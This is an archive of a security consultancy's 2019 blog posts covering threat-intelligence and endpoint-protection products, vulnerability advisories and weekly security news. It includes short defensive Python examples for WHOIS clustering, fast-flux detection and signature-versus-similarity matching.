
Products and Services
Technical Archives

What is Cisco Umbrella Investigate?

Companies today face huge challenges to detect, investigate and respond to security attacks, and it can be difficult to tackle incidents with limited staff. Once attackers have found a way in, they will work their way through your network to get to your sensitive data. Before launching an attack campaign, cyber criminals need to spin up servers, buy blocks of IP addresses, and register domains to host their malware. These activities provide digital 'fingerprints' which in turn provide vital clues that can help resolve and prevent attacks.

Cisco Umbrella Investigate gives you access to a live, up-to-date view of domains, IP addresses and malware file hashes – all of which can help to pinpoint an attacker’s infrastructure and predict emerging threats. This information is commonly called ‘threat intelligence’.

The intelligence provided by Investigate is collected from Cisco Talos, the industry-leading threat intelligence group consisting of researchers, data scientists, and engineers. Talos underpins the entire Cisco security ecosystem and helps to deliver protection against attacks and malware.

With Investigate, Ironshare analysts (or your own security analysts if you prefer) can quickly drill into the critical information required to understand an attacker’s infrastructure in minutes, where more traditional methods would take hours or even days to complete.

How does Investigate work?

Investigate delivers deep levels of information which highlight the relationships between key components of the attacker’s infrastructure: web sites, domains, IP addresses, networks (autonomous systems, or ASNs, on the internet) and malicious file samples, identified through their unique file hashes.

This information is all delivered through a single page view that can be drilled into to unveil further related detail, as required. This view gives an ‘at a glance’ determination as to whether a domain, IP address or file is considered malicious or safe to use.

Investigate analyses a huge amount of global internet data and malware, providing access to real-time and historical information. This helps to:

  • Prioritize incident investigations through quick access to accurate information
  • Improve response times by having relevant information earlier in the investigation
  • Reduce the overall time it takes to investigate security incidents
  • Improve the use of threat intelligence, providing real-time data to your other security systems as applicable, such as a SIEM (Security Information and Event Management system).

To expand a little, Investigate has the following capabilities and features:

  • Includes threat scoring for suspicious or malicious domains by assessing a number of key domain attributes.
  • Use of WHOIS data to see the ownership information for domains, which can highlight malicious domains registered with the same contact information.
  • The ability to see suspicious spikes in DNS traffic to a specific domain.
  • Ability to detect fast flux domains; fast flux is a technique used to hide malicious infrastructure and typically indicates domains used for hosting malware or phishing sites.
  • Ability to predict where attacks may be staged in the future through the identification of related domains and IPs that are associated with malware.
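The WHOIS and fast flux capabilities listed above can be approximated on your own WHOIS and passive DNS data. The following Python is an added example written for this post; it is not Cisco's Investigate code and does not use the Investigate API. The record formats, the reserved `.example` domains, the documentation-range IP addresses, and the thresholds (at least five distinct IPs and a median TTL of 300 seconds or less) are all constructed assumptions chosen to illustrate the two pivots.

```python
"""Two pivots that threat-intelligence tools automate, shown on constructed data:
grouping domains by WHOIS registrant contact, and flagging fast-flux candidates
from passive DNS observations. Record formats and thresholds are assumptions."""
from collections import defaultdict
from dataclasses import dataclass
from statistics import median


@dataclass(frozen=True)
class WhoisRecord:
    """Minimal WHOIS view: only the fields this pivot needs."""
    domain: str
    registrant_email: str
    registrar: str


@dataclass(frozen=True)
class DnsObservation:
    """One A-record answer seen for a domain in a (hypothetical) passive DNS feed."""
    domain: str
    ip: str
    ttl: int  # seconds


def cluster_by_registrant(records):
    """Group domains by registrant e-mail (case-insensitive). Only groups with
    more than one domain are returned: a contact shared across several
    registrations is what makes the pivot worth a look."""
    groups = defaultdict(set)
    for rec in records:
        groups[rec.registrant_email.lower()].add(rec.domain.lower())
    return {email: sorted(domains) for email, domains in groups.items() if len(domains) > 1}


def fast_flux_candidates(observations, min_distinct_ips=5, max_median_ttl=300):
    """Flag domains whose answers rotate through many IPs with short TTLs.
    Both thresholds are illustrative assumptions, not a vendor's scoring."""
    ips = defaultdict(set)
    ttls = defaultdict(list)
    for obs in observations:
        ips[obs.domain].add(obs.ip)
        ttls[obs.domain].append(obs.ttl)
    return sorted(
        domain for domain in ips
        if len(ips[domain]) >= min_distinct_ips and median(ttls[domain]) <= max_median_ttl
    )


# Constructed sample WHOIS records (reserved .example names, fictitious contacts).
SAMPLE_WHOIS = [
    WhoisRecord("shop-login-verify.example", "reg1@example.net", "Registrar A"),
    WhoisRecord("account-update-check.example", "Reg1@Example.net", "Registrar B"),
    WhoisRecord("another.example", "reg1@example.net", "Registrar A"),
    WhoisRecord("example.org", "hostmaster@example.org", "Registrar C"),
]

# Constructed passive DNS: one domain rotating through six IPs with 60 s TTLs,
# one static site, and one CDN-like name with many IPs but hour-long TTLs.
SAMPLE_DNS = (
    [DnsObservation("cdn-rotate.example", f"198.51.100.{i}", 60) for i in range(1, 7)]
    + [DnsObservation("static-site.example", "203.0.113.10", 3600)] * 6
    + [DnsObservation("busy-cdn.example", f"192.0.2.{i}", 3600) for i in range(1, 7)]
)


if __name__ == "__main__":
    for email, domains in cluster_by_registrant(SAMPLE_WHOIS).items():
        print(f"{email}: {', '.join(domains)}")
    print("fast-flux candidates:", fast_flux_candidates(SAMPLE_DNS))
```

A legitimate CDN can also answer with many IPs, and some use short TTLs too, which is why a tool like Investigate combines this kind of heuristic with reputation, registration age and request-pattern data rather than relying on it alone; treat the output as candidates for an analyst to look at, not a verdict.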

What’s it like to work with?

Investigate can be used through two different methods:

Web-based Console

The web console gives real-time access to all of the intelligence within Investigate and allows you to move through the different data during an investigation. As Investigate is integrated into Cisco Umbrella, you can either query matches through the Umbrella reports (which opens Investigate), or query directly using the dynamic search engine in the web console. Searches can be based upon exact matches for domains, IP addresses, file hashes etc., or can be pattern based for more flexibility to search on non-exact matches (terms, brand names etc.).

The integration with Umbrella can help to turn the alerts and events in your logs into usable intelligence quickly, with just a simple search.

Application Programming Interface

The second method uses a RESTful API. APIs are simply pieces of software that allow communication between two different applications. The Investigate API allows you to bring the threat intelligence data into your other security systems to enhance your overall visibility. This includes systems such as Security Information and Event Management (ArcSight, Splunk etc.) as well as other threat intelligence platforms.

Using the search function

Investigate is very easy to use: once logged into the Investigate console, simply input a search string, e.g. a domain, URL, IP address or regular expression pattern.

Cisco Umbrella Investigate Dashboard

Using Google.com as a quick example search, we can see that the domain is deemed safe, has a good score and is very popular, as expected.

Cisco Umbrella Activity search image 1

Alternatively using a known bad domain, we see that Investigate has classed this as suspicious and placed it into the Umbrella Block List.

Cisco Umbrella Activity search image 2

Digging further into the Investigate report, we see some of the reasons why. First of all, it shows the domain has a large number of associated malware samples with high threat scores.

The Timeline section of the report provides an at-a-glance view of the current categorisation of the domain, along with changes to the category over time. It shows that this domain is currently part of a Command and Control botnet.

Cisco Umbrella timeline image

Umbrella and Investigate

As described above, the integration with Umbrella is a key point. The Activity Search is a real-time log of traffic sent to Umbrella. From the Activity Search, we can launch Investigate on any malicious or blocked traffic for further analysis.

Cisco Umbrella Activity search

Ironshare and Cisco Umbrella Investigate

At Ironshare we aim to simplify the life of our customers in terms of IT Security. Together Ironshare and Cisco Umbrella Investigate can help organisations overcome common challenges such as:

  • Lack of visibility to the threats and risk areas in the business.
  • Limited resources – a shortage of analysts with the knowledge and experience required to analyse data, or analysts who are already overwhelmed with current workloads.
  • Lack of, or ineffective use of, threat intelligence to identify threats and remove risk.
  • Difficulties with managing or prioritizing security incidents.
  • Being flooded with alerts that are difficult to manage and understand.

Conclusion

In summary, Investigate is a great tool in the arsenal of the security analyst. It provides a single correlated source of threat intelligence that includes WHOIS data, domain and IP reputation to determine what’s good and what’s bad, geographical location of IP addresses and domains, DNS request patterns and malware file analysis.

Ironshare provide a fully managed service for Cisco Umbrella that includes Investigate, meaning all you need to do is tell us what you want to know about, and when. We’ll then tailor the service to your needs and deliver management reporting and recommendations as often as requested.

Ironshare have full access to Investigate as part of the Managed Service, which we actively use to inform customers about related threats as applicable.

Alternatively, if the Umbrella Platform package is preferred, Ironshare can provide your organisation with its own direct access to the Investigate console.

Our service is applicable to companies of all shapes and sizes, meaning that even the smallest businesses can get a full enterprise service, and use our reports to easily identify problem PCs or employee activity concerns.

If you'd like to get more detailed information or pricing, please click here to Contact Us.


By Stuart Hare on 6/2/19

Security Advisory Archives

Time to Update your Android - Critical PNG Bug

Google have released a new security update for their Android OS after it was disclosed that devices were vulnerable to a number of flaws, including three critical remote code execution vulns.

The Android Security Bulletin for Feb 2019 includes a total of 42 CVEs; 11 vulns were classed as Critical, 30 High, and 1 Moderate, spanning Framework, System, Kernel, NVIDIA graphics, and Qualcomm network components.

Google consider the three PNG-based critical flaws to be the most severe included in this month’s bulletin, which impact millions of devices worldwide running Android v7.0 to v9. A PNG is a common type of image file format, similar to bitmap (BMP) and JPEG.

These three critical vulns are identified as CVE-2019-1986, CVE-2019-1987 & CVE-2019-1988, and exist due to the way that the Android OS handles PNG files. By sending a specially crafted PNG image file, a malicious actor can execute code remotely on the target device with privileged access.

This can be exploited by sending the malicious image via email or a messaging app, and is triggered by the user simply opening and viewing the image, resulting in device hijack and compromise.

It is understood that to date Google have had no reports of this vuln being exploited in the wild.

It is advised that all Android devices be updated with the latest security patch levels 2019-02-01 & 2019-02-05 ASAP, to fix the issues contained in this advisory. As Android is a multi-platform open source OS, an available update for your device may depend on a release from your specific manufacturer.

To check a device's security patch level, please see Check and update your Android version.

Sign Up

To keep up to date with our news and posts, why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailList

Ironshare – Security Simplified

By Stuart Hare on 6/2/19

News

Metro Bank Falls Victim to SS7 Two-Factor Attack

Motherboard have reported how the UK’s Metro Bank has fallen victim to a two-factor authentication (2FA) attack that exploits the legacy Signalling System 7 (SS7) protocol to intercept 2FA codes.

The SS7 protocol was originally developed in 1975, and in 1980 the ITU formally approved it as the international standard for telephone signalling, call establishment and routing.

Flaws in SS7 are known to have been exploited for quite some time, and successful attacks against the protocol are capable of tracking phones, as well as intercepting calls and text messages.

It has previously been believed that the ability to exploit SS7 has been firmly in the hands of intelligence agencies, but Motherboard confirmed that this is far more widespread. Cyber criminals are using this to attack bank customers with the aim of clearing out their bank accounts.

Although cases are still pretty rare, these types of attacks are being seen globally, and Metro Bank have confirmed that a small number of their customers have been victims of such an attack, which resulted in financial fraud and stolen funds.

“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud. We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue,” a Metro Bank spokesperson told Motherboard in an email.

“Of those customers impacted by this type of fraud, an extremely small number have been Metro Bank customers, and none have been left out of pocket as a result. Customers should continue to remain vigilant and report any suspicious activity using the number on the back of their card or on our website.”

The fundamental flaw stems from the lack of authentication in SS7, which does not require a sender to prove who they are to successfully send a message. This results in malicious parties being able to reroute messages across the network.

The UK's National Cyber Security Centre are actively working to help secure the SS7 protocol, to prevent abuse of the UK mobile telephone networks and tackle SMS spoofing, but the harsh reality is that the telco industry has been ignoring these exploitable gaps in the world's telecom infrastructure for too long.

That said, these are sophisticated and targeted attacks. A 2FA code on its own is not enough for an attacker to access a victim's account, so they must use other methods to first gain access to the customer's username and password. This is typically achieved using phishing attacks that make use of fake emails and/or websites to capture the user’s information.

As a user or customer, your best method of protecting yourself against these threats is to remain vigilant when it comes to fake emails and phishing websites. Never click on email links from people you don’t know or trust, and look out for suspicious email and website addresses that don’t match those of your bank.

If you are a Metro Bank customer and feel that you may have been a victim of fraud, you can use their website for guidance, which includes a link to report your concerns:

https://www.metrobankonline.co.uk/ways-to-bank/i-want-some-information-about/fraud-and-security/


By Stuart Hare on 5/2/19

News

Mass Recall on Kids Smart Watch

The European Commission has ordered the child smart watch provider ENOX to recall its Safe-KID-One product, after it was found the watch could be used by bad actors to send messages to the watch and use the inbuilt GPS to find the locations of its child users.

The Commission's rapid alert system, which is used to inform other European nations of dangerous products, states that these smart watches pose a ‘serious’ risk, potentially threatening the child’s safety.

ENOX Smartwatch

The Safe-KID-One is badged as ‘A High Tech SIM/GPS Safety and Surveillance Smart Watch for Kids’ by its manufacturer and has the tag line of ‘You can Keep an Eye on, Talk to and Watch over your Kid Everywhere and All the Time’. It includes a built-in microphone, speaker and GPS locator, and supports a smartphone companion app for parents to use to keep tabs on their children.

The risk highlighted by the EC states that a malicious user is able to send commands to any watch and make it call any number of their choosing, allowing communication directly with the child wearer, as well as the ability to pinpoint the child’s location through GPS.

This is primarily related to the unencrypted communication used by the devices to communicate with the ENOX servers, which enables unauthenticated access to its data. This results in access to the device data, location history, phone numbers and serial number, which can be easily captured or modified.

In EC terms, this product does not comply with the requirements of the Radio Equipment Directive. It is reported that this may be the first time that the Rapid Alert System (RAPEX) has been used to report a dangerous product based on its risk to privacy and data protection.

ENOX contacted The Register and told them: "This Version of the Watch was tested by Bundesnetzagentur in Germany last Summer, and it did pass the test and was released for sale. In December 2018 we got the attached confirmation from them, that the watch had passed their test."

This is not the first time that children’s smart watches have been in the news; in November ’18 Pen Test Partners reported a similar issue in the MiSafes smart watch.

In the interests of child safety, we recommend that parents no longer allow their children to use these devices, until such time as the vendor can prove they have resolved these issues.


By Stuart Hare on 5/2/19

Products and Services

Endpoint Protection: Cisco AMP vs Anti-Virus?

Endpoint protection is a regular topic for discussion and is a key component in a Defence in Depth strategy. Since the introduction of Cisco AMP for Endpoints, there have been many questions regarding where AMP sits in comparison to Endpoint Protection from other vendors and how it should be used.

Common questions have included:

  • Can AMP work with my current Anti-virus software?
  • Does AMP use signatures like my current Anti-Virus software?
  • Can AMP replace my current Anti-virus software?

The answer to all these questions is Yes, but there are some key points to understand.

In our previous post, What is Cisco AMP for Endpoints?, we explained that AMP is Cisco’s Next Generation Endpoint Protection solution, which uses advanced techniques and dynamic file behaviour analysis to detect the presence or installation of malicious software, enable rapid response, and prevent or remove an infection.

Here we will cover some of these common questions.

Can AMP work with my current Anti-virus software?

AMP for Endpoints was specifically designed to work together with existing Anti-virus solutions such as McAfee and Symantec. AMP does not clash with existing AV products, nor does it try to compete with them.

Instead, AMP allows the AV software to perform its inspection and analysis first; if the AV detects malware it can perform its configured quarantine or removal actions as required, and AMP does not need to get involved. In the event that the AV does not detect the presence of malware, AMP then steps in to perform its analysis and blocking as required.

Does AMP use signatures like my current Anti-Virus software?

A signature is a static string or pattern of text that uniquely identifies a virus. These signatures allow Anti-virus software to detect and trigger alerts when a virus is present. As these are static identifiers, the virus needs to be known and understood; if the virus behaviour changes or a new virus is released, then new signatures will be required. This can lead to gaps in your endpoint security. These Anti-virus products are often referred to as ‘Point-in-time detection’ technologies.

In addition to the cloud-based dynamic file analysis, AMP for Endpoints includes Point-in-time offline protection engines for Anti-virus scanning. Two offline protection engines are currently available with AMP:

  • ClamAV engine is available for offline AV scanning of Linux and Apple Mac devices
  • TETRA engine is available for offline AV and rootkit scanning of Microsoft Windows devices

These offline protection engines are not enabled by default, but they can be enabled in the policy as required. If you decide to run AMP alongside existing AV software, then these offline engines should not be enabled.

Both engines run offline copies of the signature files locally on the endpoint and must connect to the AMP cloud regularly to download the latest signatures, in the same way that standard Anti-virus products do.
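To make the point-in-time limitation concrete, here is an added Python example written for this post. It is not Cisco's code and does not show how the ClamAV or TETRA engines work: an exact signature check fails once a sample is trivially altered, while a similarity ("fuzzy fingerprint") check still relates it to the known sample. The "samples" are harmless constructed text strings, the signature database is hypothetical, and the similarity measure is a 4-byte n-gram Jaccard index chosen for clarity, with a 0.5 threshold picked for this data.

```python
"""Exact-signature matching versus a similarity ("fuzzy") check.
Constructed example: the byte strings are harmless test text, not malware,
and the similarity measure is a simple n-gram Jaccard index, not the
algorithm used by any AMP engine."""
import hashlib

# Constructed "known sample", as a signature vendor might have catalogued it.
KNOWN_SAMPLE = b"TEST-PATTERN v1: writes %TEMP%\\svc.bin; adds Run key; contacts 198.51.100.7"

# Hypothetical signature database: an exact file hash and an exact byte string.
SIGNATURE_DB = {
    "sha256": {hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "TestFamily.A"},
    "strings": {b"contacts 198.51.100.7": "TestFamily.A"},
}


def signature_match(sample, db=SIGNATURE_DB):
    """Point-in-time detection: return the family name on an exact hash or
    exact byte-string hit, otherwise None. Any change to the matched bytes
    defeats both checks."""
    digest = hashlib.sha256(sample).hexdigest()
    if digest in db["sha256"]:
        return db["sha256"][digest]
    for pattern, family in db["strings"].items():
        if pattern in sample:
            return family
    return None


def ngrams(data, n=4):
    """Set of all overlapping n-byte substrings of data."""
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def similarity(a, b, n=4):
    """Jaccard index of the two samples' n-gram sets: 0.0 (disjoint) to 1.0 (identical)."""
    ga, gb = ngrams(a, n), ngrams(b, n)
    if not ga and not gb:
        return 1.0
    return len(ga & gb) / len(ga | gb)


def fuzzy_match(sample, known=(KNOWN_SAMPLE,), threshold=0.5):
    """Return (matched, best_score): matched is True when the sample is at
    least `threshold` similar to any known sample."""
    best = max(similarity(sample, k) for k in known)
    return best >= threshold, best


# A constructed variant: same structure, but the dropped filename and the
# contact address have been changed, as a new build of the same thing would be.
VARIANT = KNOWN_SAMPLE.replace(b"svc.bin", b"upd.bin").replace(b"198.51.100.7", b"203.0.113.9")
# An unrelated, benign file for comparison.
UNRELATED = b"Quarterly sales figures for the northern region, reviewed and approved."


if __name__ == "__main__":
    for name, sample in [("known", KNOWN_SAMPLE), ("variant", VARIANT), ("unrelated", UNRELATED)]:
        matched, score = fuzzy_match(sample)
        print(f"{name:9s} signature={signature_match(sample)!s:13s} fuzzy={matched} score={score:.2f}")
```

Fuzzy matching narrows the gap but does not close it: a substantially rewritten sample shares little with the original, which is why the behavioural analysis and retrospective security described in the next section matter beyond either kind of static check.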

Can AMP replace my current Anti-virus software?

In short, you can use AMP to replace your existing AV product. Cisco AMP for Endpoints goes beyond these normal signature-based detection and prevention technologies by including multiple engines to enhance AMP's ability to detect malware.

AMP for Endpoints provides deep visibility and control using the following:

  • Point-in-time Malware detection and blocking: Uses signature matching, machine learning and fuzzy fingerprinting to analyse and catch the malware at point of entry, in real-time.
  • Continuous analysis, remediation and retrospective security: When a file lands on an endpoint, AMP watches the file continuously and records its activity, regardless of whether the file is deemed good or bad. If a good file starts to exhibit bad behaviour in the future, AMP can alert your team, so you can contain and remediate the threat quickly.
  • Threat intelligence: AMP is backed up by solid threat intelligence provided by the Cisco Talos group. Talos analyses millions of malware samples and terabytes of data every day. Once available, Talos pushes this threat intelligence to AMP for Endpoints so users are protected 24/7. On average Talos intelligence and real-world block data is received by Cisco’s global Security products within 5 mins of being available.
  • Advanced Sandboxing: With the help of AMP Threat Grid, AMP can perform automated static and dynamic analysis of files, against a large number of behavioural indicators, to determine whether a file is malicious.

Cisco have many clients that have used AMP for Endpoints to replace their existing Anti-virus software.

Ultimately though, the decision is yours. You need to consider whether AMP for Endpoints is suitable to replace your current AV. This may depend on several factors: your organisation's security policy; the capabilities of your current endpoint protection software and whether you feel it is performing to your standards; and your organisation's requirements for endpoint security, to name a few.

What AMP for Endpoints does not do

Cisco’s AMP for Endpoints does not aim to mimic the standard Anti-virus and Endpoint Protection products that most people are familiar with today. As discussed above, AMP is a Next Generation Endpoint Security solution, which uses advanced methods to detect attacks and malware infections that occur on your PCs, laptops, servers etc.

Below are a few items available in typical Endpoint Security products that Cisco AMP for Endpoints does not provide:

  • Host based or Personal Firewall services
  • Host based or Personal Intrusion Prevention Services
  • Port and device control

To cover the above items, you could use AMP in conjunction with alternative layers of security such as network-based controls or integrated software such as Windows Defender, which is built into Microsoft operating systems.

Conclusion

Cisco AMP for Endpoints is a simple, strong and effective solution in the fight against malware and modern day cyber-attacks. It can be used in conjunction with, or as an alternative to, your existing Endpoint Protection solution, depending upon your requirements.

AMP does not have to operate as a standalone product; it is part of a larger security architecture that is integrated with numerous products in the Cisco Security portfolio. These products are built to work together as an integrated security system, to provide faster detection and response to threats across your organisation and close the gaps that come from using different individual security products that are unaware of each other.

Where do Ironshare fit in?

Ironshare can help you to get up and running with Cisco AMP for Endpoints within days. We not only provide step-by-step guidance on deployment within your organisation, we can also manage the day-to-day running and reporting, leaving your teams to get on with their usual day job.

Our aim is to provide Security, Simplified. That means we can communicate in a non-technical manner (or technical if you prefer) and just give you the information you want.

Step 1 – Simple Pricing

Ironshare are Certified Cisco partners who specialise in security and operate in a completely transparent manner. Unlike other providers we make no secret of our pricing, and you can simply click here to get an accurate price estimate. No nonsense – simple!

Cisco Select

Step 2 – Simple Deployment

Cisco AMP for Endpoints requires no on-site hardware and can be deployed very easily, providing advanced protection for all of your endpoints. Our technical team would need to speak with your software deployment teams, but rolling out the lightweight connector is straightforward. There might be other factors to consider for wider deployments, but none will be complicated, and even the largest of companies can have this up and running very quickly. We will guide you through the entire process. No hidden costs – simple!

Step 3 – Simple Management

Although AMP for Endpoints has a great management interface, it does take time to get up to speed with the product, so to manage this yourself would require some dedicated resource to first learn, and then maintain and get the best out of, AMP for Endpoints.

Our team at Ironshare are experienced with the product. We would talk to you about what you want to achieve, and after the initial setup we will deliver a managed service that ensures your IT support or security team are aware of threats from day one. With an Ironshare managed service, your team have more time to get on with their normal day-to-day activities.

In addition, we’ll alert you to any malware issues that the product discovers and provide you with a monthly report that summarises all of the interesting facts and figures. We’ll also give you recommendations on internal actions you might need to take.

Conclusion

Ironshare are a small, niche security consultancy focused on delivery of fast and efficient solutions to businesses. Our experienced team aim to provide a fully managed service that takes the strain away from your employees and allows you to focus on your core business.

Ironshare – Security, Simplified

If you have any questions – please Contact Us here.

By Stuart Hare on 3/2/19

Cyber Round-up

Cyber Round-up for 1st February

Welcome to the Ironshare Cyber Round-up where we look back at the events of the last week and handpick some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

  • Airbus Data Exposed in Breach
  • Malware Takes Down Systems at Kwik Fit Garages
  • Apple Blocks Google and Facebook Due to Privacy Violation
  • UK Banking Customers Against 2FA

Airbus Data Exposed in Breach

The commercial aircraft giant Airbus have issued a statement on their website regarding a Cyber Security incident that resulted in unauthorised access to their systems and data.

As only limited information is available about the incident, how much data has been exposed, and the impact on employees or customers, is not yet understood. In their statement, however, Airbus report that the incident had no impact on its commercial operations.

“Investigations are ongoing to understand if any specific data was targeted, however we do know some personal data was accessed. This is mostly professional contact and IT identification details of some Airbus employees in Europe.”

This appears to be another sign that companies of all sizes are not doing enough to secure their systems and data. Hackers are finding it too easy to identify vulnerable internet connected systems that can be exploited and compromised.

Companies need to ensure they have several layers of security in place that can protect the organisation and maintain strong levels of data privacy. Perimeter firewalls and gateways combined with standard anti-virus products are no longer enough to defend against modern advanced threats.

Malware Takes Down Systems at Kwik Fit Garages

Kwik Fit, one of the big names in the UK for vehicle tyres, MOT and servicing, were hit by a computer virus that halted their online operations for a period and resulted in significant impact to its customers for most of this week.

In conversation with the BBC, a Kwik Fit spokeswoman confirmed that they had experienced issues with their IT systems as the result of a computer virus infection, and that their IT team were busy trying to get their systems back up and running.

"This [issue] affected a number of our systems but in the interest of ongoing security we can't confirm the source of the problem. We have been working to get our operational systems back up and running normally and while there is still some disruption, our centres are open as usual."

To date Kwik Fit have not issued a press release regarding this issue but have been communicating with their unhappy clients via social media. In a statement they claim that they do not store any financial information, and at this time have no reason to believe that any customer data has been compromised.

Although not confirmed, given the time taken to recover from the incident it is likely that this was the result of a ransomware attack.

Unfortunately, the number of cancelled appointments and unhappy customers has not only hit Kwik Fit financially but has also had a huge impact on customer trust and the overall reputation of the business. Recovery from a cyber attack can take weeks or even months, but the reputational damage caused can take years to repair.

Don’t take risks with your business reputation, bolster your cyber defences before disaster strikes.

Apple Blocks Google and Facebook Due to Privacy Violation

Google and Facebook have been repeatedly in the news recently regarding their lax approach to data privacy, and this week has been no different. With very few opponents capable of punishing these two internet giants, Apple took on the task of laying down the law after both firms managed to breach their developer agreements.

Facebook were hit hard first, when Apple found that they had been using special developer certificates for internal applications to distribute their tracking ‘Research App’ to teenage customers. These certificates are meant for the Apple enterprise program and give the software developer the ability to install powerful apps on iOS devices for use by company employees only.

A block on Google then swiftly followed, after their ‘Screenwise Meter App’, designed to monitor how people use their iPhones, was also found to be using an AEP developer certificate.

Apple’s revocation of these certificates has a significant impact on the firms: it not only prevents the apps from being distributed to devices but also stops them from working altogether. To compound the issue, a single certificate can be used with all the internal apps for an organisation, not just one.

Facebook confirmed that all their apps were impacted by this action. Unlike Facebook, who have had a few disputes with Apple around privacy concerns, Google had the benefit of working more closely with them to resolve the issues quickly.

Other companies such as Amazon and Sonos may also be added to this list soon, as it is believed that they too are issuing beta apps to non-employees. With Apple's renewed hard line on privacy and agreement violations, other vendors should learn from the example made here.

In the last couple of days both Facebook and Google have confirmed that their certificates and internal app access has been restored.

UK Banking Customers Against 2FA

A poll conducted by FICO has found that the majority of banking consumers in the UK felt that there were already too many security checks involved in banking and card payments, and that adding additional security checks such as 2FA (two-factor authentication) is not necessary.

The poll, which covered 500 consumers from the UK, Germany, Spain and Sweden, was conducted to gauge attitudes towards the new PSD2 European banking regulations, which require banks and payment services to enforce stronger authentication.

Consumers were concerned that these additional measures would bring more complexity to the process and could be impacted by poor mobile coverage, while others would not trust banks with their mobile number.

Although 2FA is not foolproof, it does add another layer of security to the authentication process. Concerns over SMS-based 2FA have been well covered in recent times, and app-based 2FA should always be the preferred option, but SMS-based 2FA is still far better than simple username and password authentication.

We at Ironshare have heard many arguments against 2FA and its added process and complexity, but we see this as simply another culture shift in the use of new technology. Typically, it only takes a few additional seconds to enter a 2FA code, and users tend to adapt quite quickly to its use which soon becomes second nature.

We recommend that you embrace the use of 2FA wherever possible, as it could be the difference in your fight against identity theft and financial fraud.

Source: https://www.infosecurity-magazine.com/news/uk-consumers-not-happy-with-psd2/

And that’s it for this week, please don’t forget to tune in for our next instalment.

Ironshare – Security Simplified

Edition #27 – 1st February 2019


By Stuart Hare on 1/2/19

Cyber Round-up

Cyber Round-up for 25th January


Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and handpick some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

  • Home Terrorised When NEST Camera Warns of Missile Strike
  • Phishing Detection is Hard! Give it a Try!
  • Apple Release Multiple Security Updates
  • Critical Flaw in Linux Apt-get Update Utility

Home Terrorised When NEST Camera Warns of Missile Strike

The Mercury News have reported how a family in the US were subjected to 5 minutes of terror after their NEST home surveillance camera was accessed by hackers and used to broadcast a North Korean missile strike warning via its built-in speakers.

The detailed broadcast message warned that missiles were heading to Chicago, Ohio and Los Angeles, that people in these areas had 3 hours to evacuate, and that the United States had retaliated against North Korea. In an interview the family stated:

“It sounded completely legit, and it was loud and got our attention right off the bat. … It was five minutes of sheer terror and another 30 minutes trying to figure out what was going on.”

Calls were made to the emergency services and to NEST before the warning was finally deemed a hoax and the incident judged to be the probable result of a hack. Surprisingly, prior to the incident the family were completely unaware that their NEST camera had speakers installed.

This is not the first time NEST have been in the news for remote hacking of their cameras; only last month we were hearing about a polite, security-conscious hacker who instructed the owner, via a compromised camera, on how to improve his security.

These incidents highlight the ever-growing risks associated with IoT smart devices and connecting them directly to your home and business networks without thinking about security. These hacks are typically the result of poor password practice by the users. Reuse of passwords across multiple online services that then appear in data breaches is a sure-fire way for hackers to gain access to your devices. In addition, a simple compromise of an IoT device could lead to further or even complete compromise of all devices on your network.

To help protect against these attacks: never use the same password more than once; if available, enable two factor authentication (sometimes called two step verification); and if possible create a new sub-network in your home or office to separate these IoT devices from the computers you deem more critical (PCs, laptops, servers etc.).

Phishing Detection is Hard! Give it a Try!

Phishing attacks have been around for quite some time and detecting them is not getting any easier. With the scammers trying new tricks and making the emails and websites more like the real thing, even hardened security professionals who deal with analysing phishing threats can have a hard time telling a real email from a scam. If this is hard for InfoSec professionals, just imagine how hard it is for the general public and business users.

Education and awareness into what a phishing threat looks like, and the general steps you can take to identify one, is a key step to protecting yourself or your business from attack.

There are lots of options available that businesses can use to educate their users (such as PhishMe and KnowBe4), but now Google and their Jigsaw unit have developed a short quiz that is available to everyone, so you can see how good you are at spotting what’s real and what’s fake.

Google Phishing Quiz

The quiz is available online at phishingquiz.withgoogle.com, so why not have a go and test your phishing detection skills. Its simple but clever interface gives classic examples and shows you the common things to check and look out for.

It starts by asking for a name and email address, but there is no need to enter any real information about yourself; entering fake details here is just fine. I have taken this myself and managed to get 6 out of 8 questions correct, and hopefully by giving this a try you will see that spotting a phish is hard.

Generally phishing starts by trying to hook a potential victim into clicking on a malicious link or attachment contained in an email. Once the victim has taken the bait, phishing websites are used to capture their usernames, passwords and personal information, which can then be used by the malicious actors for identity theft, fraud and account compromise.

As a final note, please remember that security education and awareness is a great tool, and a must when trying to combat the threat of phishing and other cyber attacks, but alone it will never be a complete solution or mythical silver bullet. Combining education with good practice, process and technology is what’s required to create a more robust security posture.

Apple Release Multiple Security Updates

Tuesday saw the release of multiple security updates for vulnerabilities across Apple's iPhone, iPad, Mac, TV and Watch products. The highlights in these updates address critical vulnerabilities that exist in the iOS and macOS operating systems.

iOS 12.1.3 has been released to resolve a number of privilege escalation and remote code execution issues with iPhones and iPads. Buffer overflow / memory bounds flaws in the device's Bluetooth implementation (CVE-2019-6200) and FaceTime app (CVE-2019-6230) can allow an attacker to execute remote code on the affected devices. The fix for CVE-2019-6206 covers a flaw in the password autofill feature that allowed a password to still be filled in after it had been manually cleared.

On the macOS front, Mojave, Sierra and High Sierra updates are available to address several vulns. Flaws in the Intel graphics driver (CVE-2018-4452) have been addressed that would allow a malicious application with system privileges to execute code, while memory corruption issues in the sandbox process (CVE-2019-6235) and hypervisor (CVE-2018-4467) could result in the bypassing of sandbox restrictions and the elevation of privileges.

Staying up to date with the latest security patches goes a long way when defending against online threats, so please update your devices as soon as you can. Notes for all January updates can be found here.

Critical Flaw in Linux Apt-get Update Utility

The APT package manager, aka apt-get, a well-known software update and removal utility in Linux distributions (such as Ubuntu and Debian), has been in the news this week due to a critical vuln that could allow a malicious actor to launch a man-in-the-middle attack and execute remote code.

In his post, researcher Max Justicz explains that due to the use of clear text HTTP in the update process, and inadequate checks of HTTP redirects, a hacker can manipulate the response to redirect to another mirror site and install malicious packages with root privileges. This is a technical post but explains in depth how he was able to exploit this vulnerability. Max, and many others, believe that if apt used HTTPS communication by default for its update process, the man-in-the-middle attack would not have been possible.

